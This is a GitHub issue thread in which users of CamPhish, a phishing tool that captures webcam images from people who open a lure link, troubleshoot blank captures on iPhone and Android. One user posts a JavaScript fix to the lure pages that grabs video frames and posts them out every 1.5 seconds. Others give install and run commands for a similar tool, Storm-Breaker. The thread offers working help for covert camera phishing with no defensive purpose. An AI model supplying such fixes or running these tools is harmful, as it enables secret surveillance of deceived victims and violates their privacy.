CamPhish icon indicating copy to clipboard operation
CamPhish copied to clipboard

Blank white png

Open Coordinate-Cat opened this issue 4 years ago • 9 comments

Hi. I've been using your wonderful project. Thanks!

I'm currently trying to generate a png file targeting the iphone intercom, but it's not working. I can do it on macOS on my pc. On the iphone, it generates a png, but it's a blank png. Do you have any idea what might be causing this?

スクリーンショット 2022-02-27 15 42 12

Coordinate-Cat avatar Feb 27 '22 06:02 Coordinate-Cat

try storm breaker

ladoual avatar Mar 04 '22 06:03 ladoual

hI, THE SAME PROBLEM I HAVE. i'M testing on Kali linux. i send link to iphone and android. In Both case i have always white PNG. How resolve? what's mean "break the storm"?

zorks56 avatar Mar 15 '22 12:03 zorks56

@zorks56 plz check email

Coordinate-Cat avatar Mar 15 '22 15:03 Coordinate-Cat

Same problem, pls help!!

Alex-Wong-HK avatar Mar 16 '22 16:03 Alex-Wong-HK

Fixed. festivalwishes.html and LiveYTTV.html is missing video.play() ;

var context = canvas.getContext('2d'); setInterval(function(){ video.play(); // add this context.drawImage(video, 0, 0, 640, 480); var canvasData = canvas.toDataURL("image/png").replace("image/png", "image/octet-stream"); post(canvasData); }, 1500); }

Alex-Wong-HK avatar Mar 16 '22 17:03 Alex-Wong-HK

hello did anybody find a solution ?

seraphim721 avatar Mar 18 '22 13:03 seraphim721

nvm found it

https://github.com/ultrasecurity/Storm-Breaker

$ git clone https://github.com/ultrasecurity/Storm-Breaker $ cd Storm-Breaker $ sudo bash linux-installer.sh $ python3 -m pip install -r requirments.txt $ sudo python3 Storm-Breaker.py

seraphim721 avatar Mar 18 '22 14:03 seraphim721

can you explain further etc

eddapp avatar May 20 '22 19:05 eddapp

The guy above has the right stuff just spelled wrong. Here's the correct one:

$ git clone https://github.com/ultrasecurity/Storm-Breaker $ cd Storm-Breaker $ sudo bash install.sh $ sudo python3 -m pip install -r requirements.txt $ sudo python3 st.py

nathanr17 avatar May 27 '22 17:05 nathanr17